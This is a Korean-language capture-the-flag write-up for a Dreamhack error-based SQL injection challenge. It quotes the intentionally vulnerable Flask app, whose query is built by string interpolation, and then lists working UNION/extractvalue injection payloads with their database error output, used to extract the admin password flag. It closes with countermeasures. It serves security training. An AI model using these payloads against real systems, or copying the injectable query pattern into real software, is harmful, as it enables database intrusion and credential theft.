[Dreamhack] Level1: error based sql injection

🛎️ Access

Simple Error Based SQL Injection !

 

 

👾 Exploit Algorithm & Payload

> app.py

import os
from flask import Flask, request
from flask_mysqldb import MySQL

app = Flask(__name__)
app.config['MYSQL_HOST'] = os.environ.get('MYSQL_HOST', 'localhost')
app.config['MYSQL_USER'] = os.environ.get('MYSQL_USER', 'user')
app.config['MYSQL_PASSWORD'] = os.environ.get('MYSQL_PASSWORD', 'pass')
app.config['MYSQL_DB'] = os.environ.get('MYSQL_DB', 'users')
mysql = MySQL(app)

template ='''
<pre style="font-size:200%">SELECT * FROM user WHERE uid='{uid}';</pre><hr/>
<form>
    <input tyupe='text' name='uid' placeholder='uid'>
    <input type='submit' value='submit'>
</form>
'''

@app.route('/', methods=['POST', 'GET'])
def index():
    uid = request.args.get('uid')
    if uid:
        try:
            cur = mysql.connection.cursor()
            cur.execute(f"SELECT * FROM user WHERE uid='{uid}';")
            return template.format(uid=uid)
        except Exception as e:
            return str(e)
    else:
        return template


if __name__ == '__main__':
    app.run(host='0.0.0.0')import os

 

> init.sql

CREATE DATABASE IF NOT EXISTS `users`;
GRANT ALL PRIVILEGES ON users.* TO 'dbuser'@'localhost' IDENTIFIED BY 'dbpass';

USE `users`;
CREATE TABLE user(
  idx int auto_increment primary key,
  uid varchar(128) not null,
  upw varchar(128) not null
);

INSERT INTO user(uid, upw) values('admin', 'DH{**FLAG**}');
INSERT INTO user(uid, upw) values('guest', 'guest');
INSERT INTO user(uid, upw) values('test', 'test');
FLUSH PRIVILEGES;

 

 

#1

---

: '/' 페이지에서 uid 파라미터에 값을 입력하면 반응을 확인할 수 있다.

 

 

#2

---

'
(1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1")

: 싱글 쿼터를 입력 시, 에러문이 발생하는 것을 확인할 수 있다.

: 에러를 발생 시켜서 정보를 얻어야 하는 것을 알 수 있다.

 

 

#3

---

' UNION SELECT 1#
(1222, 'The used SELECT statements have a different number of columns')

' UNION SELECT 1,2#
(1222, 'The used SELECT statements have a different number of columns')

' UNION SELECT 1,2,3#     <- 반응이 다름

: ' UNION SELECT 1,2,3# 에서 다른 반응이(오류 발생X) 나타났기 때문에 데이터베이스 해당 열이 3개로 구성되어 있다는 것을 파악할 수 있다.

 

#4

---

' UNION SELECT extractvalue(1, concat(0x3a, version()))#
(1105, "XPATH syntax error: ':10.3.39-MariaDB-0+deb10u1'")

' UNION SELECT extractvalue(1, concat(0x3a, (SELECT DATABASE())))#
(1105, "XPATH syntax error: ':users'")
...

: ' UNION SELECT extractvalue(1, concat(0x3a, (   )))#을 활용하여 다양한 데이터베이스 정보를 확인할 수 있다.

: 이는 'extractvalue(xml_source, xpath_expression)' 두 번째 인자인 xpath_expression의 XPATH 문법을 강제로 올바르지 않은 형태로 작성하여 오류를 유발한 것이다.

 

' UNION SELECT extractvalue(1, concat(0x3a, (SELECT LENGTH(upw) FROM user WHERE uid='admin')))#
(1105, "XPATH syntax error: ':44'")

: 이 에러문을 활용해서 사용자 uid(아이디)만 알면 해당 사용자의 upw(비밀번호)를 유추할 수 있었다.

: admin(관리자)의 비밀번호 갯수가 44개로 확인되었다.

 

 

🔑Analysis and results for obtaining the Flag DH{…}

---

여기서 다양한 방법으로 익스플로잇 가능하다.

 

1) 

' UNION SELECT extractvalue(1, concat(0x3a, (SELECT substr(upw,1,1)='A' from user WHERE uid='admin')))#
(1105, "XPATH syntax error: ':0'")

' UNION SELECT extractvalue(1, concat(0x3a, (SELECT substr(upw,1,1)='B' from user WHERE uid='admin')))#
(1105, "XPATH syntax error: ':0'")
...

' UNION SELECT extractvalue(1, concat(0x3a, (SELECT substr(upw,1,1)='D' from user WHERE uid='admin')))#
(1105, "XPATH syntax error: ':1'")
' UNION SELECT extractvalue(1, concat(0x3a, (SELECT substr(upw,2,1)='H' from user WHERE uid='admin')))# (1105, "XPATH syntax error: ':1'") ...

: subquery안에substr을 활용하여 참(True/1), 거짓(False/0)으로 해당 열에 어떤 값이 비밀번호인지 확인할 수 있다.

: 더욱 빠르게 알아내려면 자동화 코드 작성 및 도구를 사용하면 된다.

 

2)

' UNION SELECT extractvalue(1, concat(0x3a, (SELECT substr(bin(ord(upw)),1,1)=1 from user WHERE uid='admin')))#
(1105, "XPATH syntax error: ':1'")
' UNION SELECT extractvalue(1, concat(0x3a, (SELECT substr(bin(ord(upw)),2,1)=1 from user WHERE uid='admin')))#
(1105, "XPATH syntax error: ':0'")
' UNION SELECT extractvalue(1, concat(0x3a, (SELECT substr(bin(ord(upw)),3,1)=1 from user WHERE uid='admin')))#
(1105, "XPATH syntax error: ':0'")
' UNION SELECT extractvalue(1, concat(0x3a, (SELECT substr(bin(ord(upw)),4,1)=1 from user WHERE uid='admin')))#
(1105, "XPATH syntax error: ':0'")
' UNION SELECT extractvalue(1, concat(0x3a, (SELECT substr(bin(ord(upw)),5,1)=1 from user WHERE uid='admin')))#
(1105, "XPATH syntax error: ':1'")
' UNION SELECT extractvalue(1, concat(0x3a, (SELECT substr(bin(ord(upw)),6,1)=1 from user WHERE uid='admin')))#
(1105, "XPATH syntax error: ':0'")
' UNION SELECT extractvalue(1, concat(0x3a, (SELECT substr(bin(ord(upw)),7,1)=1 from user WHERE uid='admin')))#
(1105, "XPATH syntax error: ':0'")

 

-> 1000100 = (2^6) * (2^2) = 68('D')

: 비트 연산을 통해서도 비밀번호를 유추할 수 있다.

: 이것 또한 빠르게 알아내려면 자동화 코드 작성 및 도구를 사용

 

3) 

' UNION SELECT extractvalue(1, concat(0x3a, (SELECT ascii(substr(upw,1,1))=68 FROM user WHERE uid='admin')))#
(1105, "XPATH syntax error: ':1'")

: 이진 탐색을 활용하여 해당 값이 존재하면 1, 존재하지 않으면 0을 반환하면서 비밀번호를 유추할 수 있다.

: 이것 또한 빠르게 알아내려면 자동화 코드 작성 및 도구를 사용

 

4)

' UNION SELECT extractvalue(1, concat(0x3a, (SELECT upw FROM user WHERE uid='admin')))#
(1105, "XPATH syntax error: ':DH{c3968c78840750168774ad951...'")

' UNION SELECT extractvalue(1, concat(0x3a, (SELECT substr(upw,20,45) FROM user WHERE uid='admin')))#
(1105, "XPATH syntax error: ':8774ad951fc98bf788563c4d}'")

: 여기서는 너무 admin(관리자) upw 값이 길어서 잘리는 것을 확인할 수 있다.

: 이때 substr을 이용하여 일정한 영역만 잘라서 리턴해주면 된다. 

 

: 사실 이것 이외도 더 다양하게 접근 가능할 것으로 보인다.

 

 

 

📌 Summary

---

Error-Based SQL Injection

 공격자가 의도적으로 잘못된 SQL 쿼리를 만들어서 데이터베이스에 전송하는 공격 기법. 이러한 잘못된 SQL 쿼리가 실행되면, 데이터베이스는 오류 메시지를 반환함. 이 오류 메시지는 보통 데이터베이스의 구조나 중요한 데이터에 대한 정보가 포함되어 있기 때문에 공격자는 이 오류 메시지를 분석하여 구조를 파악할 수 있게됨. 주의.

 

-대응방안- 

1) 입력 값 검증

2) 파라미터화된 쿼리 사용(Prepared Statement)

3) 적절한 오류 메시지 관리
: 사용자에게 직접 환경 메시지가 노출되지 않도록 해야함

4) 최소 권한 원칙 적용

5) 웹 방화벽 사용

...